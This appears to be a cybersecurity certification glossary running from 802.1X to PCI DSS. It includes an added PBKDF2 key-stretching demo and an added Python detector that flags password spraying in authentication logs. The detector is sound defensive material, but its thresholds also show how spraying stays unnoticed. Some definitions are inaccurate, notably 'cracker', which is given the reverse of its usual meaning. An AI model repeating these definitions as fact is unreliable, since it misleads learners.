Glossary of Key Terms

Numerics

802.1X A standard that defines a framework for centralized port-based authentication.

A

acceptable use policy (AUP) A policy that is used to inform users of the actions that are allowed and those that are not allowed.

Attack Complexity (AC) CVSS base metric that describes the difficulty of exploiting the vulnerability.

Attack Vector (AV) CVSS base metric that describes how the attacker would exploit the vulnerability.

accreditation Occurs when the adequacy of a system’s overall security is accepted by management.

accuracy A description of the correctness of the data.

active defense Process of aligning your incident identification and incident response processes such that there is an element of automation built into your reaction to any specific issue.

Active Directory (AD) Microsoft implementation of SSO. See also single sign-on (SSO).

active enumeration The technique of sending packets of some sort to the network and then assessing responses.

active vulnerability scanner A type of scanner that can take action to block an attack, such as block a dangerous IP address.

Advanced Access Content System (AACS) Protects Blu-ray and HD DVD content. Hackers have been able to obtain the encryption keys to this system.

advanced persistent threat (APT) Threat from a highly organized attacker with significant resources that is carried out over a long period of time.

Adversary Corner of the Diamond model that describes the intent of the attack.

aggregation The process of assembling or compiling units of information at one sensitivity level and having the resultant totality of data being of a higher sensitivity level than the individual components.

air gap A condition in which a device has no network connections, so all access to the system must be done manually by adding and removing items with a flash drive or other external device.

Aircrack-ng A set of command-line tools for sniffing and attacking wireless networks.

analysis The step in the intelligence cycle where data is combed and analyzed to identify relevant pieces of information.

annual loss expectancy (ALE) The expected risk factor of an annual threat event. Calculated as the single loss expectancy (SLE) times the annualized rate of occurrence (ARO).

annualized rate of occurrence (ARO) The estimate of how often a given threat might occur annually.

anti-tamper technology Designed to prevent access to sensitive information and encryption keys on a device.

Application log Log that focuses on the operation of Windows applications. Events in this log are classified as error, warning, or information, depending on the severity of the event.

application programming interface (API) integration Ensures that the applications on either end of the API are synchronized and protects the integrity of the information that passes through the API. It also enables the proper updating and versioning required in many environments.

application wrapping Technique to protect mobile devices and the data they contain. Application wrappers (implemented as policies) enable administrators to set policies that allow employees with mobile devices to safely download an app, typically from an internal store.

Arachni A Ruby framework for assessing the security of a web application.

asset criticality A measure of how essential an asset is to the organization’s business.

asset tagging Process of placing physical identification numbers of some sort on all assets.

asset value (AV) Value of an asset. Multiplied by the exposure factor (EF) to calculate single loss expectancy (SLE).

asymmetric algorithms Algorithms that use both a public key and a private or secret key. The public key is known by all parties, and the private key is known only by its owner.

atomic execution A set of instructions either executes in order and in its entirety, or the changes it makes are rolled back or prevented. Atomic operations in concurrent programming are program operations that run independently of any other processes (threads). Making the operation atomic consists of using synchronization mechanisms to make sure that the operation is seen, from any other thread, as a single, atomic operation. This increases security by preventing one thread from viewing the state of the data while the first thread is still in the middle of the operation.

attack frameworks Frameworks and methodologies that include security program development standards, enterprise and security architect development frameworks, security control development methods, corporate governance methods, and process management methods.

attack vector A segment of the communication path that an attack uses to access a vulnerability.

attestation Process in which the software and platform components have been identified, or “measured,” using cryptographic techniques.

attribute-based access control (ABAC) Authentication system that grants or denies user requests based on arbitrary attributes of the user and arbitrary attributes of the object, and environment conditions that may be globally recognized.

Authentication (Au) CVSS base metric that describes the authentication an attacker would need to get through to exploit the vulnerability.

Authentication Header (AH) IPsec component that provides data integrity, data origin authentication, and protection from replay attacks.

authentication period How long a user can remain logged in.

authentication server In the 802.1X framework, the centralized device that performs authentication.

authenticator In the 802.1X framework, the device through which the supplicant is attempting to access the network.

automated malware signature creation A method of identifying malware in which the AV software monitors incoming unknown files for the presence of malware and analyzes the file based on both classifiers of file behavior and classifiers of file content.

Availability (A) CVSS base metric that describes the disruption that might occur if the vulnerability is exploited.

B

backdoor/trapdoor A mechanism implemented in many devices or applications that gives the user who uses the backdoor unlimited access to the device or application.

BACnet protocol An application, network, and media access control (MAC) layer communications service. It can operate over a number of Layer 2 protocols, including Ethernet.

Basel II International accord that addresses minimum capital requirements, supervisory review, and market discipline of financial institutions.

bash A scripting language that is used to work in the Linux interface.

bastion host Device exposed directly to the Internet or to any untrusted network while screening the rest of the network from exposure.

beaconing Traffic that leaves a network at regular intervals.

big data Sets of data so large or complex that they cannot be analyzed by using traditional data processing applications.

blacklisting The process of identifying and blocking as bad senders a list of unacceptable e-mail addresses, Internet addresses, websites, applications, or some other identifier, while allowing all others. See also whitelisting.

block cipher Cipher that performs encryption by breaking the message into fixed-length units.

blue team A group of technicians who act as the network defense team during testing.

botnet A type of malware that, after it is installed, gives the bot the ability to connect back to the hacker’s computer. After that, the hacker’s server controls all the bots located on these machines.

bring your own device (BYOD) policy Policy designed to allow personal devices in the network.

buffer overflow An attack that occurs when the amount of data that is submitted is larger than the buffer can handle.

Burp Suite A suite of tools used for testing web applications.

bus encryption Protects the data traversing hardware buses.

Business Continuity Planning (BCP) committee Performs vulnerability analysis and risk assessment.

business impact analysis (BIA) Lists the critical and necessary business functions, their resource dependencies, and their level of criticality to the overall organization.

C

Cain and Abel A well-known password cracking program.

call list/escalation list A list of contact information for all individuals, such as first responders, who might need to be alerted during the investigation of an incident.

Capability Corner of the Diamond model that describes the attacker intrusion tools and techniques.

Capability Maturity Model Integration (CMMI) A comprehensive set of guidelines that address all phases of the software development life cycle (SDLC).

carving Forensic technique used to identify a file when only fragments of data are available and no file system metadata is available.

Cellebrite A forensic tool that focuses on collecting evidence from smartphones.

certificate revocation list (CRL) A list of expired and revoked certificates.

certification Evaluates the technical system components.

certificate authority (CA) The entity in a PKI that creates and signs digital certificates, maintains the certificates, and revokes them when necessary.

change management Formal process for managing change.

characteristic factor authentication Authentication based on something the person is.

clearing Removing data from the media so that it cannot be reconstructed using normal file recovery techniques and tools.

click-jacking An attack that crafts a transparent page or frame over a legitimate-looking page that entices the user to click something.

cloud access security broker (CASB) A software layer that operates as a gatekeeper between an organization’s on-premises network and the provider’s cloud environment.

COBIT Security controls development framework that uses a process model to subdivide IT into four domains.

code of conduct/ethics Details standards of business conduct.

cognitive password A type of password that is a piece of information that can be used to verify an individual’s identity.

collection The step in the intelligence cycle where data searching and organizing occurs.

combination password A type of password that uses a mix of dictionary words, usually two that are unrelated.

commodity malware Malware that is widely available for either purchase or by free download. It is not customized or tailored to a specific attack.

Common Configuration Enumeration (CCE) SCAP component; configuration best practice statements maintained by the National Institute of Standards and Technology (NIST).

Common Platform Enumeration (CPE) SCAP component; a NIST standardized method for describing and classifying operating systems, applications, and hardware devices.

Common Vulnerabilities and Exposures (CVE) SCAP component; list of vulnerabilities in published operating systems and applications software.

Common Vulnerability Scoring System (CVSS) A system of ranking vulnerabilities that are discovered based on pre-defined metrics.

Common Weakness Enumeration (CWE) SCAP component; an identification scheme for design flaws in the development of software that can lead to vulnerabilities.

Communications Assistance for Law Enforcement Act (CALEA) of 1994 Requires telecommunications carriers and manufacturers of telecommunications equipment to modify and design their equipment, facilities, and services to ensure that they have built-in surveillance capabilities.

community cloud A cloud deployment model in which the cloud infrastructure is shared among several organizations from a specific group with common computing needs.

compensating control A type of control that is applied to mitigate the impact or likelihood of an attack; also called a countermeasure.

complex password A type of password that includes a mixture of upper- and lowercase letters, numbers, and special characters.

Computer Fraud and Abuse Act (CFAA) Affects any entities that engage in hacking of “protected computers,” as defined in the act.

Computer Security Act of 1987 The first law to require a formal computer security plan. It was written to protect and defend the sensitive information in the federal government systems. Superseded in 2002 by the Federal Information Security Management Act (FISMA).

confidence level In the context of intelligence sources, a description of the perceived integrity of any particular data.

Confidentiality (C) CVSS base metric that describes the information disclosure that may occur if the vulnerability is exploited.

configuration baseline A floor or minimum standard that is required.

configuration lockdown Prevents any changes to the configuration of a device, even by users who formerly had the right to configure the device.

containerization Server virtualization technique in which the kernel allows for multiple isolated user space instances.

contamination Intermingling or mixing of data of one sensitivity or need-to-know level with that of another.

Content Scrambling System (CSS) Uses encryption to enforce playback and region restrictions on DVDs.

continuous deployment/delivery Attempts to make sure that you can release new changes to your customers quickly in a sustainable way. Continuous deployment goes one step further with every change that passes all stages of your production pipeline being released to your customers.

continuous integration Software development practice whereby the work of multiple individuals is combined a number of times a day.

control plane Network architecture plane that carries signaling traffic originating from or destined for a router. This is the information that enables routers to share information and build routing tables.

Controller Area Network (CAN bus) Designed to allow vehicle microcontrollers and devices to communicate with each other’s applications without a host computer.

copyright Legal protection that ensures that a work that is authored is protected from any form of reproduction or use without the consent of the copyright holder.

corporate-owned, personally enabled (COPE) A strategy in which an organization purchases mobile devices and users manage those devices.

corrective control A type of control put into place to reduce the effect of an attack or other undesirable event.

cracker An individual who attempts to break into secure systems without using the knowledge gained for any nefarious purposes.

credential stuffing Entering a large number of spilled credentials automatically into websites until they are potentially matched to an existing account, which the attacker can then hijack for their own purposes.

credentialed scan A scan performed with administrator access.

criticality A measure of the importance of the data.

cross-site request forgery (CSRF) An attack that exploits the website’s trust of the browser. The website thinks that the request came from the user’s browser and was actually made by the user.

cross-site scripting (XSS) An attack that occurs when an attacker locates a website vulnerability and injects malicious code into the web application.

cryptoperiod The time span during which a specific key is authorized for use by legitimate entities, or the time that the keys for a given system will remain in effect.

D

data correlation The process of locating variables in the information that seem to be related.

data enrichment A technique that allows one process to gather information from another process or source and then customize a response using the data from the second process or source.

data exfiltration The theft of data from a device or network.

data loss prevention (DLP) Software that attempts to prevent data leakage.

data masking Altering data from its original state to protect it.

data plane Network architecture plane that carries user traffic; also known as the forwarding plane.

data sovereignty The concept that data stored in digital format is subject to the laws of the country in which the data is located.

Data Protection API (DPAPI) API that lets you encrypt data using the user’s login credentials.

dd A Linux command that is used to convert and copy files.

debugging A process that steps through the code interactively.

decompiling A process that attempts to reconstruct high-level language source code.

decomposition The process of breaking down software to discover how it works, perhaps who created it, and, in some cases, how to prevent the software from performing malicious activity.

deidentification The process of deleting or masking personal identifiers, such as a personal name, from a set of data.

demilitarized zone (DMZ) A network logically separate from the intranet where resources that will be accessed from the outside world are made available to unauthenticated users.

denial-of-service (DoS) attack An attack in which attackers flood a device with enough requests to degrade the performance of the targeted device.

dereference Occurs when a pointer with a value of NULL is used as though it pointed to a valid memory area.

destruction The destroying of the media on which data resides.

detective control A type of control that is in place to detect an attack while it is occurring.

deterrent control A type of control that deters or discourages an attacker.

DevSecOps A development concept that grew out of the DevOps approach to software development and that emphasizes security in all phases.

DHCP snooping Used to prevent a poisoning attack on the DHCP database.

Diamond Model of Intrusion Analysis Intrusion analysis model that emphasizes the relationships and characteristics of four basic components: the adversary, capabilities, infrastructure, and victims.

digital rights management (DRM) Used to control the use of digital content.

digital signature A hash value encrypted with the sender’s private key.

digital watermarking Involves embedding a logo or trademark in documents, pictures, or other objects.

directive control A type of control that specifies acceptable practice within an organization.

directory traversal One of the ways malicious individuals are able to access parts of a directory to which they should not have access.

disassembly Reading the machine code into memory and then outputting each instruction as a text string.

dissemination The step in the intelligence cycle where information is shared with those responsible for designing security controls to address issues.

DNP3 A master/slave protocol used in building automation that uses port 19999 when using Transport Layer Security (TLS) and port 20000 when not using TLS.

DOM XSS XSS attack in which the entire tainted data flow from source to sink takes place in the browser. The source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser.

domain bridging Using as a hotspot a device that has been made a member of the domain, allowing access to the organizational network to anyone using the hotspot.

domain generation algorithm (DGA) Algorithm that is used by attackers to periodically generate large numbers of domain names that can be used as rendezvous points with their command and control servers.

Domain-based Message Authentication, Reporting, and Conformance (DMARC) An e-mail authentication and reporting protocol that improves e-mail security within federal agencies.

DomainKeys Identified Mail (DKIM) Allows e-mail source verification by providing a method for validating a domain name identity that is associated with a message through cryptographic authentication.

dual-homed firewall A type of firewall with two interfaces, one pointing to the internal network and another connected to the untrusted network.

dynamic analysis Software code analysis done with the code executing.

Dynamic ARP Inspection (DAI) A security feature that intercepts all ARP requests and responses and compares each response’s MAC address and IP address information against the MAC–IP bindings contained in a trusted binding table.

E

Economic Espionage Act of 1996 Affects companies that have trade secrets and any individuals who plan to use encryption technology for criminal activities.

eFuse Technology that allows for the dynamic real-time reprogramming of computer chips.

Electronic Communications Privacy Act (ECPA) of 1986 Affects law enforcement and intelligence agencies; extended government restrictions on wiretaps from telephone calls to include transmissions of electronic data by computer and prohibited access to stored electronic communications.

e-mail signature block A set of information such as name, e-mail address, company title, and credentials that usually appears at the end of an e-mail.

emanations Electromagnetic signals that are emitted by an electronic device.

embedded link A link embedded in one website that leads to another site.

embedded system A piece of software built into a larger piece of software that is in charge of performing some specific function on behalf of the larger system.

employee privacy issues and expectation of privacy Concept that organizations must give employees the proper notice of any monitoring that might be used.

Encapsulating Security Payload (ESP) IPsec component that provides all that AH does as well as data confidentiality.

EnCase Forensic A case (incident) management tool that offers built-in templates for specific types of investigations.

endpoint detection and response (EDR) A proactive endpoint security approach designed to supplement existing defenses.

enumeration The process of discovering what is in the network along with any other pieces of information that might be helpful in a network attack or compromise.

EU Electronic Security Directive Defines electronic signature principles.

EU Data Protection Directive Provides direction on how to follow the laws set forth in the principles.

executable process analysis Determines what process is using/taxing the CPU.

exposure factor (EF) The percentage value or functionality of an asset that will be lost when a threat event occurs.

Extensible Access Control Markup Language (XACML) A standard for an access control policy language using XML.

Extensible Markup Language (XML) attack An attack that targets the use of XML in a website. In one example, it compromises the application that parses or reads and interprets the XML. If the XML input contains a reference to an external entity and is processed by a weakly configured XML parser, it can lead to the disclosure of confidential data, denial of service, server-side request forgery, and port scanning. This is called an XML external entity attack.

external scan A vulnerability scan performed from outside the organization’s network to assess the likelihood of an external attack.

extranet A network logically separate from the intranet where resources that will be accessed from the outside world are made available to authenticated users.

F

false negative Occurs when a scanner does not identify a vulnerability that actually exists.

false positive Occurs when a scanner identifies a vulnerability that does not exist.

FATKit A memory forensics tool that automates the process of extracting interesting data from volatile memory.

fault tolerance Provided when a backup component begins operation when the primary component fails.

Federal Information Security Management Act (FISMA) of 2002 Requires all federal agencies to develop, document, and implement an agencywide information security program.

Federal Intelligence Surveillance Act (FISA) of 1978 The first act to give procedures for the physical and electronic surveillance and collection of “foreign intelligence information” between “foreign powers” and “agents of foreign powers” and applied only to traffic within the United States. It was amended by the USA PATRIOT Act of 2001 and the FISA Amendments Act of 2008.

Federal Privacy Act of 1974 Provides guidelines on collection, maintenance, use, and dissemination of PII about individuals that is maintained in systems of records by federal agencies.

field programmable gate array (FPGA) A type of programmable logic device (PLD) that is programmed by blowing fuse connections on the chip or using an antifuse that makes a connection when a high voltage is applied to the junction. A PLD is an integrated circuit with connections or internal logic gates that can be changed through a programming process.

FIN scan Type of scan that sets the FIN bit only.

firewall Device or software whose purpose is to inspect and control the type of traffic allowed.

flow analysis Type of analysis that focuses on ensuring that confidential and private information is isolated from other information.

forensic investigation suite A collection of tools that are commonly used in digital forensic investigations.

Forensic Toolkit (FTK) A commercial toolkit that can scan a hard drive for all sorts of information.

formal method Method of software analysis that follows prescribed procedures.

forwarding Routing e-mail through another organization’s e-mail system.

framework A methodology designed to help guide security professionals.

Function as a Service (FaaS) An extension of Platform as a Service (PaaS) that goes further and completely abstracts the virtual server from the developers. Charges are based not on server instance sizes but on consumption and executions.

fuzzing Injecting invalid or unexpected input (sometimes called faults) into an application to test how the application reacts.

G

geofencing The application of geographic limits to where a device can be used.

geotagging The process of adding geographical identification metadata to various media.

Gramm-Leach-Bliley Act (GLBA) of 1999 Affects all financial institutions, including banks, loan companies, insurance companies, investment companies, and credit card providers.

graphical password A type of password that uses graphics as part of the authentication mechanism; also called CAPTCHA password.

H

hacker An individual who attempts to break into secure systems to obtain knowledge about the systems and possibly use that knowledge to carry out pranks or commit crimes.

hardening Removing unnecessary functions to reduce the attack surface.

hardware security module (HSM) An appliance that safeguards and manages digital keys used with strong authentication and provides crypto processing.

hashing The process of using a hashing algorithm to reduce a large document or file to a character string that can be used to verify the integrity of the file.

Health Care and Education Reconciliation Act of 2010 Affects healthcare and educational organizations. This act increased some of the security measures that must be taken to protect healthcare information.

heap overflow A buffer overflow that occurs in the heap data area. Heap overflows are exploitable in a different manner from stack-based overflows.

Helix A live CD with which you can acquire evidence and make drive images without affecting the data on the host.

heuristics Analysis that determines the susceptibility of a system to a particular threat/risk using decision rules or weighing methods.

HIPAA Breach Notification Rule Requires HIPAA covered entities and their business associates to provide notification following a breach of unsecured protected health information (PHI).

honeypot A system that is configured to be attractive to hackers and to lure them into spending time attacking it while information is gathered about the attack.

host scanning A process that involves identifying the live hosts on a network or in a domain namespace.

host-based firewall A type of firewall that resides on a single host and is designed to protect that host only.

hunt teaming A proactive threat hunting tactic in which a team works together to detect, identify, and understand advanced and determined threat actors. It is a new proactive approach to security that is offensive in nature rather than defensive, which has been common for security teams in the past.

hybrid cloud A cloud deployment model in which an organization provides and manages some resources in-house and has others provided externally via a public cloud.

I

imaging Creating a bit-level image of the disk.

impact analysis Analysis that determines impact of the event.

impersonation Sending e-mail that appears to come from someone else.

incident command system (ICS) Designed to provide a way to enable effective and efficient domestic incident management by integrating a combination of facilities, equipment, personnel, procedures, and communications operating within a common organizational structure.

incident form A form that is used to describe the incident in detail.

incident response A formal process or set of procedures for responding to cybersecurity incidents.

incident summary report A document that summarizes the incident.

indicator management Process of collecting and analyzing indicators of compromise (IOCs).

indicator of compromise (IOC) Any activity, artifact, or log entry that is typically associated with an attack of some sort.

inference Occurs when someone has access to information at one level that allows her to infer information about another level.

Infrastructure Corner of the Diamond model that describes the set of systems an attacker uses to launch attacks.

Infrastructure as a Service (IaaS) Cloud service model in which the vendor provides the hardware platform or data center, and the company installs and manages its own operating systems and application systems.

infrastructure as code (IaC) Manages and provisions computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools.

input validation The process of checking all input for issues such as proper format and proper length.

insecure object reference A process that occurs when a user has permission to use an application but is accessing information to which she should not have access.

integer overflow Occurs when math operations try to create a numeric value that is too large for the available space.

integrated intelligence The consideration and analysis of intelligence data from a perspective that combines multiple data sources and attempts to make inferences based on this data integration.

Integrity (I) CVSS base metric that describes the type of data alteration that might occur.

intellectual property A tangible or intangible asset to which the owner has exclusive rights.

internal scan A vulnerability scan performed from inside the organization’s network to assess the likelihood of an insider attack.

Internet Key Exchange (IKE) An IPsec component that provides the authentication material used to create the keys exchanged by ISAKMP during peer authentication.

Internet of Things (IoT) Refers to a system of interrelated computing devices, mechanical and digital machines, and objects that are provided with unique identifiers and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.

Internet Security Association and Key Management Protocol (ISAKMP) An IPsec component that handles the creation of a security association for the session and the exchange of keys.

intrusion detection system (IDS) A system that creates a log of every security event that occurs.

intrusion prevention system (IPS) A system that takes action when a security event occurs.

Internet Protocol Security (IPsec) A suite of protocols used to create an encrypted connection.

ISO/IEC 27000 Series A family of security program development standards providing guidance on how to develop and maintain an information security management system (ISMS).

ISO/IEC 27001:2013 The latest version of the 27001 standard, one of the most popular standards by which organizations obtain certification for information security. It provides guidance on ensuring that an organization’s information security management system (ISMS) is properly built, established, maintained, and continually improved.

isolation/sandboxing Placing malware where it can be safely probed and analyzed.

ITIL A framework of IT service management best practices, originally developed by the UK government’s Central Computer and Telecommunications Agency (CCTA) and now maintained by AXELOS.

J

John the Ripper Password cracker that runs on Unix/Linux, macOS, and Windows.

jumpbox A server that is used to access devices that have been placed in a secure network zone such as a DMZ.

K

kernel debugger A debugger that operates at ring 0.

key escrow The process of storing keys with a third party to ensure that decryption can occur.

key stretching Cryptographic technique that makes a weak key or password harder to attack by running it through a deliberately slow derivation function (for example, many iterations of a keyed hash, as in PBKDF2), so that each candidate guess costs the attacker more time.
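
The following is an added example (not part of the original glossary) showing key stretching with PBKDF2-HMAC-SHA256 from Python’s standard library. It derives a stored key from a password, shows how the cost of testing one guess rises with the iteration count, and verifies a password with a constant-time comparison. The timing helper and its fixed salt are assumptions for illustration only; a real system uses a random per-user salt.

```python
import hashlib
import hmac
import time


def stretch(password: str, salt: bytes, iterations: int, hash_name: str = "sha256") -> bytes:
    """Derive a 32-byte key with PBKDF2-HMAC. The iteration count is the work factor:
    every candidate password an attacker tries must pay for the same number of rounds."""
    return hashlib.pbkdf2_hmac(hash_name, password.encode("utf-8"), salt, iterations, dklen=32)


def verify(password: str, salt: bytes, iterations: int, stored_key: bytes) -> bool:
    """Recompute the stretched key and compare in constant time."""
    return hmac.compare_digest(stretch(password, salt, iterations), stored_key)


def seconds_per_guess(iterations: int, trials: int = 5) -> float:
    """Measure the average wall-clock cost of testing one candidate at a given work factor
    (constructed timing helper; the salt here is fixed only so the measurement is comparable)."""
    salt = b"fixed-salt-for-timing"
    start = time.perf_counter()
    for i in range(trials):
        stretch(f"candidate-{i}", salt, iterations)
    return (time.perf_counter() - start) / trials


if __name__ == "__main__":
    # Same password and salt, different work factors: the key changes and the cost grows.
    for rounds in (1, 10_000, 100_000):
        print(f"{rounds:>7} iterations: {seconds_per_guess(rounds) * 1000:8.3f} ms per guess")
    salt = b"\x01\x02\x03\x04\x05\x06\x07\x08"       # constructed; use os.urandom(16) in practice
    stored = stretch("correct horse battery staple", salt, 100_000)
    print("verify correct:", verify("correct horse battery staple", salt, 100_000, stored))
    print("verify wrong:  ", verify("Tr0ub4dor&3", salt, 100_000, stored))
```

The first line of the loop is effectively the unstretched case; the later lines show that raising the iteration count multiplies the attacker’s cost per guess by the same factor while a single legitimate login remains cheap.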

kill chain A model that describes the stages of an intrusion.

knowledge factor authentication Authentication based on something committed to memory.

known threats Threats of which we are aware.

KnTTools A memory acquisition and analysis tool used with Windows systems.

L

Layer 2 Tunneling Protocol (L2TP) Protocol that operates at Layer 2 of the OSI model. Like PPTP, L2TP can use various authentication mechanisms; however, L2TP does not provide any encryption. It is typically used with IPsec.

legacy systems Older systems that may be less secure than newer systems.

legal hold A legal requirement placed on an organization to maintain archived data for longer periods for legal proceedings.

lessons learned report Lists and discusses what was learned about how and why the incident occurred and how to prevent it from occurring again.

logic bomb Type of malware that executes when a particular event takes place.

LonWorks/LonTalk3 Peer-to-peer protocol used in building automation; uses port 1679.

M

machine learning Capability of software to gather information and make conclusions.

maintenance hook A backdoor account created by programmers to give someone full permissions in a particular application or operating system.

management plane Network architecture plane that administers the router.

managerial control A type of control that is implemented to administer the organization’s assets and personnel and includes security policies, procedures, standards, baselines, and guidelines that are established by management.

mandatory access control (MAC) Access control model in which access decisions are made by the system based on security labels assigned to subjects and objects, rather than by the resource owner.

man-in-the-middle attack An attack that intercepts legitimate traffic between two entities.

mantrap A physical access control system that consists of a series of two doors with a small room between them. The user is authenticated at the first door and then allowed into the room. At that point, additional verification occurs.

maturity models Models that rate how well defined, repeatable, and measured an organization’s processes are, so that security capabilities can be assessed and improved in defined stages.

maximum tolerable downtime (MTD) The maximum amount of time that an organization can tolerate a single resource or function being down.

mean time between failures (MTBF) The estimated amount of time a device will operate before a failure occurs.

mean time to repair (MTTR) The average time required to repair a single resource or function.

measured boot A boot process in which each boot component is hashed and the measurement is recorded (typically in the TPM’s platform configuration registers) before the component runs, so that the boot state can later be verified or attested. Unlike Secure Boot, it records the boot chain rather than blocking unsigned components.

Memdump A free tool that runs on Windows, Linux, and Solaris that simply creates a bit-by-bit copy of the volatile memory on a system.

memorandum of understanding (MOU) Document that, while not legally binding, indicates a general agreement between the principals to do something together.

memory dumping Analyzing the entire memory content used by an application.

MicroSD HSM A hardware security module that connects to the microSD port on a device that has such a port.

microservices A variant of the service-oriented architecture (SOA) structural style that arranges an application as a collection of loosely coupled services. The focus is on building single-function modules with well-defined interfaces and operations.

MITRE ATT&CK Knowledge base of adversary tactics and techniques based on real-world observations. It is an open system, and attack matrices are created for various industries.

mobile code Software that is transmitted across a network to be executed on a local system.

mobile device management (MDM) A system that is used to control mobile device settings, applications, and other parameters when those devices are attached to the enterprise.

Modbus A master/slave (client/server) protocol used in industrial and building automation; Modbus TCP uses TCP port 502.

multifactor authentication (MFA) An authentication process that requires more than a single authentication factor.

multihomed firewall A type of firewall with three interfaces: one connected to the untrusted network, one connected to the internal network, and one connected to the DMZ.

N

near field communication (NFC) A short-range type of wireless transmission that is used in contactless payment systems such as Apple Pay and Google Pay.

Nessus Professional A proprietary network scanner developed by Tenable Network Security.

NetFlow A technology developed by Cisco that is supported by all major vendors and can be used to collect and subsequently export IP traffic accounting information.

network access control (NAC) A service that goes beyond authentication of the user and includes examination of the state (posture) of the computer the user is introducing to the network, whether it is connecting on the LAN, over wireless, or through a remote-access or VPN connection.

next-generation firewall (NGFW) A category of devices that attempt to address traffic inspection and application awareness shortcomings of a traditional stateful firewall, without hampering the performance.

Nikto A vulnerability scanner that is dedicated to web servers.

NIST Cybersecurity Framework A voluntary framework of cybersecurity outcomes organized around core functions (Identify, Protect, Detect, Respond, and Recover) that organizations use to assess and improve how they manage cyber risk.

NIST SP 800-53 Rev 4 A security controls development framework that divides the controls into three classes: technical, operational, and management.

NIST SP 800-57 Contains recommendations for key management and is published in three parts.

NIST SP 800-128 Provides guidance on security-focused configuration management of information systems.

Nmap A tool that can be used to scan for open ports and perform many other operations, including performing certain attacks.

Node.js A runtime environment for writing network and server-side applications in JavaScript.

non-credentialed scan A scan performed without administrator access.

null scan A port scan that sends TCP packets with no flags set; a closed port answers with RST, while an open port on an RFC 793-compliant stack sends no reply.

numeric password A type of password that includes only numbers.

O

oclHashcat A general-purpose computing on graphics processing units (GPGPU)-based multi-hash cracker using a brute-force attack.

one-time password (OTP) A type of password that is used only once to log in to the access control system.

Online Certificate Status Protocol (OCSP) An Internet protocol that obtains the revocation status of an X.509 digital certificate.

OpenID An open standard and decentralized protocol by the nonprofit OpenID Foundation that allows users to be authenticated by certain cooperating sites.

OpenIOC An open framework, meant for sharing threat intelligence information in a machine-readable format.

open-source intelligence Intelligence sources that are available to all.

OpenVAS An open source scanner developed from the Nessus code base and is available as a package for many Linux distributions.

operational control A type of control that is part of the organizational security stance day to day.

organizational governance The process of controlling an organization’s activities, processes, and operations.

output encoding The process of converting data into a form that is safe for the context in which it will be rendered (for example, HTML entity encoding). Applied at output time so that characters supplied by a malicious user are displayed as data rather than interpreted as markup or code.

overflow attack Occurs when more data is written to a fixed-size area of memory than it can hold, so that the excess overwrites adjacent memory.

ownership factor authentication Authentication based on something in your possession.

P

packet analysis Analysis that examines an entire packet, including the payload.

Pacu An exploit framework used to assess and attack Amazon Web Services (AWS) cloud environments.

parameterized queries Queries in which the SQL statement is defined with placeholders and the input values are supplied separately as parameters, so that user input is treated strictly as data and cannot change the structure of the query. The primary defense against SQL injection.

passive enumeration The technique of capturing traffic and making educated assumptions from the traffic.

passive vulnerability scanner A type of scanner that cannot take action to block an attack, such as block a dangerous IP address.

passphrase password A type of password that uses a long phrase. Because of the password’s length, it is easier to remember but much harder to attack.

password complexity How the password will be structured.

password history The number of previous passwords the system remembers so that a user cannot reuse them.

password length How long the password must be.

password life How long a password will be valid.

password spraying A technique used to identify the passwords of domain users. Rather than targeting a single account as in a brute-force attack, it targets or “sprays” multiple accounts with the same password attempt.
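
The following is an added example (not from the original glossary) of detection logic that tells a password spray apart from a brute-force attempt in authentication logs. It is constructed for illustration: the log format, thresholds, and sample lines are assumptions, not any product’s format. A spraying source touches many distinct accounts with one or two attempts each inside a short window, whereas a brute-force source hammers a single account; an ordinary user who mistypes twice matches neither pattern.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed log format: ISO timestamp, source IP, target user, result.
LOG_LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\w+)$")

# Constructed sample log: one spraying source, one brute-forcing source, one ordinary user.
SAMPLE_LOG = """\
2024-05-01T09:00:01 src=203.0.113.7 user=alice result=FAIL
2024-05-01T09:00:03 src=203.0.113.7 user=bob result=FAIL
2024-05-01T09:00:05 src=203.0.113.7 user=carol result=FAIL
2024-05-01T09:00:07 src=203.0.113.7 user=dave result=FAIL
2024-05-01T09:00:09 src=203.0.113.7 user=erin result=FAIL
2024-05-01T09:00:11 src=203.0.113.7 user=frank result=FAIL
2024-05-01T09:00:13 src=203.0.113.7 user=grace result=OK
2024-05-01T09:01:00 src=198.51.100.9 user=admin result=FAIL
2024-05-01T09:01:02 src=198.51.100.9 user=admin result=FAIL
2024-05-01T09:01:04 src=198.51.100.9 user=admin result=FAIL
2024-05-01T09:01:06 src=198.51.100.9 user=admin result=FAIL
2024-05-01T09:01:08 src=198.51.100.9 user=admin result=FAIL
2024-05-01T09:01:10 src=198.51.100.9 user=admin result=FAIL
2024-05-01T09:02:00 src=192.0.2.5 user=alice result=FAIL
2024-05-01T09:02:10 src=192.0.2.5 user=alice result=FAIL
2024-05-01T09:02:20 src=192.0.2.5 user=alice result=OK
"""


def parse(lines):
    """Yield (timestamp, source, user, result) for every line that matches the format."""
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"]


def classify_sources(lines, window=timedelta(minutes=10), min_users=5, max_per_user=2, min_brute=5):
    """Label each source IP as 'password-spray', 'brute-force', or 'normal'.

    For every source, slide a window over its failed logins (sorted by time):
    many distinct users with few attempts each is a spray; many attempts against
    one user is brute force. Thresholds are assumptions to tune for your environment."""
    failures = defaultdict(list)
    for ts, src, user, result in parse(lines):
        if result == "FAIL":
            failures[src].append((ts, user))

    verdicts = {}
    for src, events in failures.items():
        events.sort()
        label = "normal"
        for i, (start, _) in enumerate(events):
            per_user = Counter(u for ts, u in events[i:] if ts - start <= window)
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                label = "password-spray"
                break
            if max(per_user.values()) >= min_brute:
                label = "brute-force"
                break
        verdicts[src] = label
    return verdicts


if __name__ == "__main__":
    for src, verdict in classify_sources(SAMPLE_LOG.splitlines()).items():
        print(f"{src:<14} {verdict}")
```

Note that a per-account lockout threshold alone never fires on the spraying source, because no single account exceeds two failures; the detection has to pivot on the source (or on the count of distinct accounts) rather than on the account.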

patching Applying updates that fix security or functional issues.

patent A right granted to an individual or a company to protect the rights to an invention.

Payment Card Industry Data Security Standard (PCI DSS) Standard that affects any organizations that handle cardholder information for the major credit card companies.

